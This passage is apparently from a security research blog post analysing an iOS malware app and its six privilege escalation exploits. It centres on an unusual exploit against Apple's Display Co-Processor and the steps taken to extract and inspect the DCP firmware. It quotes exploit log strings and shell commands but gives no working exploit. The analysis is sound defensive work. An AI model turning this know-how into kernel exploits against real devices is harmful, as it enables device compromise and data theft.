Agent.framework is partially obfuscated but, as the name suggests, seems to be a basic agent able to find and exfiltrate interesting files from the device like the Whatsapp messages database.
Six privilege escalation exploits are bundled with this app. Five are well-known, publicly available N-day exploits for older iOS versions. The sixth is not like those others at all.
This blog post is the story of the last exploit and the month-long journey to understand it.
Something's missing? Or am I missing something?
Although all the exploits were different, five of them shared a common high-level structure: an initial phase where the kernel heap was manipulated to control object placement, then the triggering of a kernel vulnerability, followed by well-known steps to turn that into something useful, perhaps by disclosing kernel memory and then building an arbitrary kernel memory write primitive.
The sixth exploit didn't have anything like that.
Perhaps it could be triggering a kernel logic bug like Linus Henze's Fugu14 exploit, or a very bad memory safety issue which gave fairly direct kernel memory access. But neither of those seemed very plausible either. It looked, quite simply, like an iOS kernel exploit from a decade ago, except one which was first quite carefully checking that it was only running on an iPhone 12 or 13.
It contained log messages like:
printf("Failed to prepare fake vtable: 0x%08x", ret);
which seemed to happen far earlier than the exploit could possibly have defeated mitigations like KASLR and PAC.
Shortly after that was this log message:
printf("Waiting for R/W primitives...");
Why would you need to wait?
Then shortly after that:
printf("Memory read/write and callfunc primitives ready!");
Up to that point the exploit made only four IOConnectCallMethod calls and there were no other obvious attempts at heap manipulation. But there was another log message which started to shed some light:
printf("Unexpected data read from DCP: 0x%08x", v49);
DCP?
In October 2021 Adam Donenfeld tweeted this:
DCP is the "Display Co-Processor" which ships with iPhone 12 and above and all M1 Macs.
There's little public information about the DCP; the most comprehensive comes from the Asahi Linux project, which is porting Linux to M1 Macs. In their August 2021 and September 2021 updates they discussed their DCP reverse-engineering efforts and the open-source DCP client written by @alyssarzg. Asahi describe the DCP like this:
On most mobile SoCs, the display controller is just a piece of hardware with simple registers. While this is true on the M1 as well, Apple decided to give it a twist. They added a coprocessor to the display engine (called DCP), which runs its own firmware (initialized by the system bootloader), and moved most of the display driver into the coprocessor. But instead of doing it at a natural driver boundary… they took half of their macOS C++ driver, moved it into the DCP, and created a remote procedure call interface so that each half can call methods on C++ objects on the other CPU!
The Asahi Linux project reverse-engineered the API used to talk to the DCP, but they are restricted to using Apple's DCP firmware (loaded by iBoot); they can't use custom DCP firmware. Consequently, their documentation is limited to the DCP RPC API, with few details of the DCP internals.
Setting the stage
Before diving into DCP internals it's worth stepping back a little. What even is a co-processor in a modern, highly integrated SoC (System-on-a-Chip) and what might the consequences of compromising it be?
Years ago a co-processor would likely have been a physically separate chip. Nowadays a large number of these co-processors are integrated along with their interconnects directly onto a single die, even if they remain fairly independent systems. We can see in this M1 die shot from Tech Insights that the CPU cores in the middle and right hand side take up only around 10% of the die:
M1 die-shot from techinsights.com with possible location of DCP added
Companies like SystemPlus perform very thorough analysis of these dies. Based on their analysis the DCP is likely the rectangular region indicated on this M1 die. It takes up around the same amount of space as the four high-efficiency cores seen in the centre, though it seems to be mostly SRAM.
With just this low-resolution image it's not really possible to say much more about the functionality or capabilities of the DCP and what level of system access it has. To answer those questions we'll need to take a look at the firmware.
My kingdom for a .dSYM!
The first step is to get the DCP firmware image. iPhones (and now M1 Macs) use .ipsw files for system images. An .ipsw is really just a .zip archive, and the Firmware/ folder in the extracted .zip contains all the firmware for the co-processors, modems, etc. The DCP firmware is this file:
Firmware/dcp/iphone13dcp.im4p
The im4p in this case is just a 25-byte header which we can discard:
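Something along these lines strips it (the 25-byte offset applies to this particular image):
$ dd if=iphone13dcp.im4p of=iphone13dcp bs=25 skip=1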
It's a Mach-O! Running nm -a to list all symbols shows that the binary has been fully stripped:
$ nm -a iphone13dcp
iphone13dcp: no symbols
Function names make understanding code significantly easier. From looking at the handful of strings in the exploit some of them looked like they might be referencing symbols in a DCP firmware image ("M3_CA_ResponseLUT read: 0x%08x" for example) so I thought perhaps there might be a DCP firmware image where the symbols hadn't been stripped.
Since the firmware images are distributed as .zip files and Apple's servers support HTTP range requests, with a bit of Python and the partialzip tool we can relatively easily and quickly fetch every beta and release DCP firmware. I checked over 300 distinct images; every single one was stripped.
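The Mach-O header still tells us what we're dealing with; checking it with otool (exact output elided; the annotations are mine):
$ otool -h iphone13dcp
# cputype 16777228 (0x0100000C, CPU_TYPE_ARM64); cpusubtype 0 (ARM64_ALL)
# an arm64e binary (pointer-authentication capable) would instead report cpusubtype 2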
That cputype is plain arm64 (ARMv8), without pointer authentication support. The binary is fairly large (3.7MB) and IDA's autoanalysis detects over 7000 functions.
With any brand new binary I usually start with a brief look through the function names and the strings. The binary is stripped so there are no function name symbols but there are plenty of C++ function names as strings:
The cross-references to those strings look like this: